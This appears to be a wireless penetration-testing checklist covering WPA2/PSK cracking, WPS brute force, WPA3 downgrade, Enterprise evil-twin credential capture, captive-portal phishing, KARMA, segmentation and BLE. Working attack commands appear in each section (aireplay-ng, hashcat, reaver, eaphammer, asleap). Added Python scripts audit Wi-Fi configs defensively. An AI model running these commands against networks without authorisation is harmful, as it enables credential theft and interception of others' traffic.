LazyHackers.in — Checklist
📶 Wireless Pentest Checklist
Wi-Fi deep-dive, item by item: scenario · command · steps · the finding · the fix
☰ How to use this guide
Wireless extends the network past the walls. The work splits by encryption type: WEP is instant, WPA2-PSK is a handshake/PMKID capture cracked offline, WPA3 resists that (so you look for downgrade), and Enterprise (802.1X/EAP) is owned by an evil twin that relays or captures credentials. The deeper questions are client-side (probe/karma) and segmentation (does guest reach corporate?). This guide turns every item into how-to-test. For what an attacker does after joining, pair with the Network checklist.
```
# Monitor mode + survey
airmon-ng check kill ; airmon-ng start wlan0
airodump-ng wlan0mon            # list APs/clients, encryption, channels
# (wifite automates much of the capture/crack flow)
wifite --kill
```

0 Survey & recon
Map every SSID/BSSID, its encryption, channel and clients — plus hidden SSIDs and rogue/unauthorised APs.
```
airodump-ng wlan0mon --band abg   # full 2.4/5 GHz survey
kismet -c wlan0mon                # rich passive survey + rogue detection
# Target a single AP to see clients + capture
airodump-ng -c <ch> --bssid <AP> -w cap wlan0mon
```

Survey & recon — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| All SSIDs/BSSIDs/encryption/channels | airodump-ng survey | Wireless inventory |
| Connected clients enumerated | airodump-ng per AP | Client inventory |
| Hidden SSID revealed | observe probes/deauth | Hidden SSID disclosure |
| Rogue/unauthorised AP | kismet / inventory diff | Rogue access point |
| Signal leakage beyond perimeter | site survey | Signal over-coverage |
1 WEP & WPA2-PSK
WEP is broken outright. WPA2-PSK is cracked offline after capturing the 4-way handshake (deauth a client to force it) or the PMKID (clientless, often faster).
WPA2-PSK: handshake & PMKID
- Capture the 4-way handshake on the target AP's channel; deauth a connected client to force a re-handshake.
- Or capture the PMKID directly (no client needed) with hcxdumptool.
- Crack offline with hashcat against a wordlist/rules; weak/seasonal passphrases fall fast.
```
# Handshake capture + forced deauth
airodump-ng -c <ch> --bssid <AP> -w cap wlan0mon
aireplay-ng -0 5 -a <AP> -c <client> wlan0mon   # deauth -> handshake
# PMKID (clientless)
hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1
hcxpcapngtool -o hash.hc22000 pmkid.pcapng
# Crack (handshake & PMKID share mode 22000)
hashcat -m 22000 hash.hc22000 rockyou.txt -r rules/best64.rule
```

WEP / WPA2-PSK — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| WEP encryption in use | survey + aircrack | WEP encryption |
| WPA2 handshake captured | airodump + deauth | Handshake capture |
| PMKID captured (clientless) | hcxdumptool | PMKID capture |
| Weak PSK cracked offline | hashcat -m 22000 | Crackable WPA2 passphrase |
| PSK reused across APs/sites | compare cracked PSKs | Reused pre-shared key |
| No 802.11w (deauth works) | deauth test | No management-frame protection |
2 WPA3
WPA3-SAE resists offline cracking, so the focus shifts to transition-mode downgrade (forcing WPA2) and known SAE implementation flaws (Dragonblood).
WPA3 — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| Transition-mode downgrade to WPA2 | rogue WPA2 + capture | WPA3 downgrade |
| Dragonblood SAE weakness | version/patch check | Dragonblood vulnerability |
| Side-channel / timing on SAE | patch check | SAE side-channel |
| 802.11w not enforced | deauth test | Management-frame protection gap |
3 WPS
WPS (push-button/PIN) is a long-standing weakness: the PIN is brute-forceable (online and offline Pixie-Dust).
```
reaver -i wlan0mon -b <AP> -vv    # online PIN brute
bully wlan0mon -b <AP> -p <pin>
# Pixie-Dust (offline, fast on vulnerable chipsets)
reaver -i wlan0mon -b <AP> -K 1
```

WPS — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| WPS enabled | wash / survey | WPS enabled |
| WPS PIN online brute | reaver/bully | WPS PIN brute force |
| Pixie-Dust offline attack | reaver -K | Pixie-Dust vulnerability |
| No lockout on PIN failures | observe behaviour | No WPS lockout |
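The fix column for sections 1–3 lives almost entirely in the AP configuration. The following is an added example, not code from the LazyHackers page: a small Python audit of a hostapd.conf that maps weak settings to the "Report as" names above (WEP keys, WPA1/TKIP, WPA2-PSK versus WPA3 transition mode, 802.11w, WPS) and also checks hostapd's `ap_isolate` for the client-isolation item in section 7. Both configs are constructed for illustration (the SSID, passphrase and SAE password are made up); the option names are hostapd's own.

```python
# Constructed sample configs (not from the page, not any real site's config).
# Weak AP: WPA3 transition mode, TKIP still allowed, no PMF, WPS on, no isolation.
WEAK_HOSTAPD_CONF = """\
interface=wlan0
ssid=CorpWiFi
hw_mode=g
channel=6
wpa=3
wpa_key_mgmt=WPA-PSK SAE
wpa_pairwise=TKIP CCMP
rsn_pairwise=CCMP
wpa_passphrase=Summer2024!
ieee80211w=0
wps_state=2
"""

# Hardened AP: WPA3-SAE only, CCMP only, PMF required, WPS off, stations isolated.
HARDENED_HOSTAPD_CONF = """\
interface=wlan0
ssid=CorpWiFi
hw_mode=g
channel=6
wpa=2
wpa_key_mgmt=SAE
rsn_pairwise=CCMP
sae_password=correct-horse-battery-staple-2024
ieee80211w=2
wps_state=0
ap_isolate=1
"""


def parse_hostapd_conf(text):
    """hostapd.conf is flat key=value; blank lines and '#' comments are ignored."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        conf[key.strip()] = value.strip()
    return conf


def audit_hostapd(conf):
    """Return checklist 'Report as' names for every weak setting found (empty = clean)."""
    findings = []
    has_wep = any(k.startswith("wep_") for k in conf)
    if has_wep:
        findings.append("WEP encryption")
    wpa = conf.get("wpa", "0")                      # 0 = none, 1 = WPA1, 2 = WPA2/RSN, 3 = both
    if wpa == "0" and not has_wep:
        findings.append("Open network")
    ciphers = conf.get("wpa_pairwise", "") + " " + conf.get("rsn_pairwise", "")
    if wpa in ("1", "3") or "TKIP" in ciphers:
        findings.append("WPA1/TKIP allowed")
    key_mgmt = conf.get("wpa_key_mgmt", "").split()
    if "WPA-PSK" in key_mgmt and "SAE" in key_mgmt:
        findings.append("WPA3 downgrade")           # transition mode: a WPA2-only client still gets a PSK handshake
    elif "WPA-PSK" in key_mgmt:
        findings.append("WPA2-PSK (offline-crackable if passphrase is weak)")
    pmf = conf.get("ieee80211w", "0")               # 0 = off, 1 = optional, 2 = required
    if pmf == "0":
        findings.append("No management-frame protection")
    elif pmf == "1":
        findings.append("Management-frame protection gap")  # legacy clients remain deauth-able
    if conf.get("wps_state", "0") != "0":
        findings.append("WPS enabled")
    if conf.get("ap_isolate", "0") != "1":
        findings.append("No client isolation")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_HOSTAPD_CONF), ("hardened", HARDENED_HOSTAPD_CONF)):
        print(name, "->", audit_hostapd(parse_hostapd_conf(text)) or "clean")
```

Run it against the real hostapd.conf (or the equivalent export from a controller) before and after the fix; every line it prints is a checklist row that should flip from finding to pass.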
4 Enterprise 802.1X / EAP
WPA2/3-Enterprise authenticates per-user via 802.1X/EAP. The classic attack is an evil twin that impersonates the RADIUS endpoint and captures MSCHAPv2 credentials — possible when clients don't validate the server certificate.
- Stand up a rogue AP with the same SSID and an EAP server that captures credentials.
- If clients don't validate the server cert (or trust any), they hand over the identity + MSCHAPv2 challenge/response.
- Crack the captured MSCHAPv2 offline (or relay it).
```
# Evil twin that harvests EAP creds
eaphammer --cert-wizard           # one-time cert
eaphammer -i wlan0 --essid CorpWiFi --channel 6 --auth wpa-eap --creds
# or hostapd-wpe (logs username + MSCHAPv2 challenge/response)
hostapd-wpe hostapd-wpe.conf
asleap -C <challenge> -R <response> -W rockyou.txt   # crack MSCHAPv2
```

Enterprise 802.1X / EAP — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| Clients do not validate server cert | eaphammer evil twin | No server-cert validation |
| PEAP/MSCHAPv2 creds captured | hostapd-wpe + asleap | EAP credential theft |
| Weak EAP method (no EAP-TLS) | review config | Weak EAP method |
| Supplicant trusts any/added CA | rogue cert test | Permissive supplicant trust |
| Identity exposed in outer EAP | capture identity | EAP identity disclosure |
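The fix side of this section is supplicant policy: pin the RADIUS CA, match the server name, anonymise the outer identity, and prefer EAP-TLS over PEAP/MSCHAPv2. The following is an added example, not code from the page: Python that parses the `network={...}` blocks of a wpa_supplicant.conf and grades each one against the table above. The three blocks (weak, partial, hardened), their paths, identities and the RADIUS hostname are constructed for illustration; the option names (`ca_cert`, `domain_match`, `anonymous_identity`, …) are real wpa_supplicant options.

```python
# Constructed wpa_supplicant.conf with three Enterprise profiles of increasing strictness
# (illustration only; identities, paths and hostnames are made up).
SUPPLICANT_CONF = """\
ctrl_interface=/var/run/wpa_supplicant

# weak: PEAP/MSCHAPv2 with no CA pinned -> an evil twin's RADIUS cert is accepted
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe@corp.example"
    password="hunter2"
    phase2="auth=MSCHAPV2"
}

# partial: CA pinned, but no server-name match -> any cert from that CA bundle is accepted
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe@corp.example"
    anonymous_identity="anonymous@corp.example"
    password="hunter2"
    ca_cert="/etc/ssl/certs/ca-certificates.crt"
    phase2="auth=MSCHAPV2"
}

# hardened: EAP-TLS, private CA pinned, server name matched, outer identity anonymised, PMF required
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    ieee80211w=2
    eap=TLS
    identity="jdoe@corp.example"
    anonymous_identity="anonymous@corp.example"
    ca_cert="/etc/wpa_supplicant/corp-radius-ca.pem"
    domain_match="radius.corp.example"
    client_cert="/etc/wpa_supplicant/jdoe.crt"
    private_key="/etc/wpa_supplicant/jdoe.key"
}
"""

# Any of these ties the pinned CA to a specific RADIUS server name.
NAME_MATCH_KEYS = ("domain_match", "domain_suffix_match", "altsubject_match", "subject_match")


def parse_supplicant_networks(text):
    """Return one dict per network={...} block; surrounding quotes are dropped from values."""
    networks, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("network={"):
            current = {}
        elif line == "}" and current is not None:
            networks.append(current)
            current = None
        elif current is not None and "=" in line and not line.startswith("#"):
            key, value = line.split("=", 1)       # phase2="auth=MSCHAPV2" keeps its inner '='
            current[key.strip()] = value.strip().strip('"')
    return networks


def audit_eap_network(net):
    """Checklist 'Report as' names for one 802.1X profile (empty list = fine)."""
    findings = []
    if "WPA-EAP" not in net.get("key_mgmt", "").split():
        return findings                            # PSK/SAE profiles are a different checklist section
    eap = net.get("eap", "")
    if eap != "TLS":
        findings.append("Weak EAP method")
    if "ca_cert" not in net:
        findings.append("No server-cert validation")
    elif not any(k in net for k in NAME_MATCH_KEYS):
        findings.append("Permissive supplicant trust")
    if eap in ("PEAP", "TTLS") and not net.get("anonymous_identity"):
        findings.append("EAP identity disclosure")  # real username travels in the cleartext outer identity
    return findings


def audit_supplicant_conf(text):
    return [audit_eap_network(n) for n in parse_supplicant_networks(text)]


if __name__ == "__main__":
    for i, result in enumerate(audit_supplicant_conf(SUPPLICANT_CONF)):
        print("network", i, "->", result or "clean")
```

The "partial" profile is the one to watch for: a CA is pinned, so the client looks configured, but a public CA bundle with no `domain_match` still accepts any certificate that bundle would sign for.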
5 Rogue AP / evil twin / captive portal
Beyond Enterprise, a same-SSID rogue AP (optionally with a fake captive portal) harvests PSK-network credentials and MITMs clients that auto-connect.
```
# Evil twin + captive portal credential harvest
eaphammer -i wlan0 --essid FreeWiFi --captive-portal
# or airgeddon / wifiphisher for guided evil-twin + portal flows
# bettercap for on-path MITM once clients associate
bettercap -iface wlan0
```

Rogue AP / evil twin / captive portal — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| Same-SSID evil twin | eaphammer/airgeddon | Evil-twin attack |
| Captive-portal credential phishing | wifiphisher portal | Captive-portal phishing |
| Clients auto-connect to rogue | observe association | Auto-join to rogue AP |
| On-path MITM after association | bettercap | Wireless MITM |
| No WIPS / rogue containment | review controls | No rogue detection |
6 Client-side attacks
Clients leak their preferred networks via probe requests; KARMA-style attacks answer those probes to lure clients onto a rogue AP without touching the real one.
```
# Harvest probed (preferred) SSIDs
airodump-ng wlan0mon              # watch 'Probes' column
# Respond to any probe (KARMA) to lure clients
eaphammer -i wlan0 --essid ANY --karma
```

Client-side attacks — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| Clients leak preferred SSIDs (probes) | airodump probes | Preferred-network leakage |
| KARMA / auto-join to rogue | eaphammer --karma | KARMA association |
| Open-network auto-join | observe behaviour | Open-network auto-join |
| Client connects despite cert error | rogue cert test | Client trust bypass |
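Sections 0 and 6 both start from the same artefact: the CSV that airodump-ng writes alongside the capture (`-w cap` produces cap-01.csv). The following is an added example, not code from the page: a Python parser for that export that diffs the AP table against an authorised-BSSID inventory (rogue/evil-twin and hidden-SSID detection from section 0, plus WEP/WPA1/open flags) and reads the station table's probed SSIDs to list the clients leaking preferred networks (section 6). The CSV content, the inventory and every MAC address are constructed for illustration; the column layout is airodump-ng's.

```python
import csv
import io
import re
from dataclasses import dataclass

# Constructed airodump-ng CSV export (not real capture data; MACs are made up).
AIRODUMP_CSV = """\

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:00:00:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40, 120, 0, 0.  0.  0.  0, 8, CorpWiFi,
AA:BB:CC:00:00:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 36, 130, WPA3, CCMP, SAE, -55,  80, 0, 0.  0.  0.  0, 8, CorpWiFi,
DE:AD:BE:EF:00:01, 2024-01-01 10:01:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -30, 200, 0, 0.  0.  0.  0, 8, CorpWiFi,
DE:AD:BE:EF:00:02, 2024-01-01 10:02:00, 2024-01-01 10:05:00, 11,  54, OPN,  ,  , -60,  50, 0, 0.  0.  0.  0, 0, ,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2024-01-01 10:00:30, 2024-01-01 10:05:00, -45, 30, AA:BB:CC:00:00:01, CorpWiFi,HomeRouter,CoffeeShop
11:22:33:44:55:77, 2024-01-01 10:00:40, 2024-01-01 10:05:00, -70,  5, (not associated), FreeWiFi
"""

# Constructed inventory: the BSSIDs we operate and the SSIDs we own.
AUTHORISED_BSSIDS = {"AA:BB:CC:00:00:01", "AA:BB:CC:00:00:02"}
MANAGED_SSIDS = {"CorpWiFi"}


@dataclass
class AccessPoint:
    bssid: str
    channel: str
    privacy: str
    essid: str

    @property
    def hidden(self):
        return self.essid == ""     # airodump leaves ESSID empty (ID-length 0) for hidden networks


@dataclass
class Station:
    mac: str
    bssid: str
    probes: list


def _rows(section):
    for row in csv.reader(io.StringIO(section)):
        yield [field.strip() for field in row]


def parse_airodump_csv(text):
    """The export is an AP table, a blank line, then a station table. The station
    table's 'Probed ESSIDs' column is itself comma-separated, so it spills into
    extra columns: everything from column 6 onwards is a probed SSID."""
    parts = re.split(r"\n\s*\n", text.strip(), maxsplit=1)
    ap_section, sta_section = parts[0], (parts[1] if len(parts) > 1 else "")
    aps, stations = [], []
    for row in _rows(ap_section):
        if len(row) >= 14 and row[0] != "BSSID":
            aps.append(AccessPoint(bssid=row[0].upper(), channel=row[3], privacy=row[5], essid=row[13]))
    for row in _rows(sta_section):
        if len(row) >= 6 and row[0] != "Station MAC":
            stations.append(Station(mac=row[0].upper(), bssid=row[5].upper(), probes=[p for p in row[6:] if p]))
    return aps, stations


def classify_aps(aps, authorised_bssids, managed_ssids):
    """Inventory diff: every BSSID we do not operate is reported; one that
    advertises our own SSID is the evil-twin case."""
    verdicts = {}
    for ap in aps:
        if ap.bssid in authorised_bssids:
            continue
        if ap.essid in managed_ssids:
            verdicts[ap.bssid] = "Rogue access point (same SSID)"
        elif ap.hidden:
            verdicts[ap.bssid] = "Unauthorised hidden-SSID AP"
        else:
            verdicts[ap.bssid] = "Unknown AP (%s)" % ap.privacy
    return verdicts


def weak_encryption(aps):
    """BSSIDs running WEP, WPA1 or no encryption at all."""
    return sorted(ap.bssid for ap in aps if ap.privacy in ("WEP", "WPA", "OPN"))


def probe_leaks(stations, managed_ssids):
    """Clients whose probe requests expose non-corporate preferred networks."""
    leaks = {}
    for s in stations:
        foreign = sorted(set(s.probes) - set(managed_ssids))
        if foreign:
            leaks[s.mac] = foreign
    return leaks


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(AIRODUMP_CSV)
    print("rogue:", classify_aps(aps, AUTHORISED_BSSIDS, MANAGED_SSIDS))
    print("weak crypto:", weak_encryption(aps))
    print("probe leaks:", probe_leaks(stations, MANAGED_SSIDS))
```

Feed it the real cap-01.csv and the site's AP inventory; the rogue dictionary is the "Rogue access point" row, and the probe-leak dictionary is the "Preferred-network leakage" row with the affected client MACs already listed.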
7 Segmentation
Once on the wireless, what can you reach? Guest must not reach corporate, and wireless clients shouldn't freely reach the wired internal network.
```
# From the guest/wireless network, test reach into corporate/internal
nmap -sS -p 22,445,3389,1433 -Pn <corporate-host>
# Client isolation check: can you reach another wireless client?
ping <another-wireless-client-ip>
```

Segmentation — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| Guest → corporate reachable | nmap from guest | Guest-network isolation break |
| Wireless → wired internal over-permitted | reachability test | Wireless-to-wired exposure |
| No client (station) isolation | ping peer client | No client isolation |
| Guest reaches management plane | probe mgmt | Management reachable from guest |
B Bluetooth / BLE
If Bluetooth/BLE devices are in scope: discovery, weak/just-works pairing, unauthenticated GATT characteristics, and sniffable traffic.
```
bluetoothctl ; hcitool lescan     # discovery
# Enumerate BLE services/characteristics (interactive gatttool session)
gatttool -b <MAC> -I
# then, at the gatttool prompt: primary ; char-desc ; char-read-hnd <handle>
# bettercap BLE module for scan/enumerate/write
bettercap -eval "ble.recon on"
```

Bluetooth / BLE — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| Device discoverable / over-advertising | lescan | Excessive BLE advertising |
| Weak/Just-Works pairing | pairing analysis | Weak BLE pairing |
| Unauthenticated GATT read/write | gatttool char-read/write | Unauthenticated characteristic |
| Sniffable/unencrypted BLE traffic | BLE sniffer | Unencrypted BLE |
| Static MAC (trackable) | observe address | No address randomisation |
✓ Coverage map & how to run it
Survey first, then take the encryption path that applies; always check client-side and segmentation; add BLE if in scope.
| Section | Run on | Focus |
|---|---|---|
| Survey 0 | Every engagement | Inventory, rogue/hidden detection |
| WEP/WPA2-PSK 1 | PSK networks | Handshake/PMKID crack |
| WPA3 2 | WPA3 networks | Downgrade, Dragonblood |
| WPS 3 | WPS-enabled APs | PIN brute / Pixie-Dust |
| Enterprise 4 | 802.1X networks | Evil twin, cert validation, EAP creds |
| Rogue/client/segmentation 5–7 | Every engagement | Evil twin, KARMA, isolation |
| Bluetooth/BLE | If in scope | Pairing, GATT, sniffing |
Core principle: the encryption type decides the attack — PSK is an offline crack, Enterprise is an evil-twin credential capture, WPA3 is a downgrade hunt. But the highest business impact is usually segmentation: prove (or break) guest↔corporate isolation, because joining the Wi-Fi is only useful if it reaches something. Tick a box only when you've actually run the test, in scope.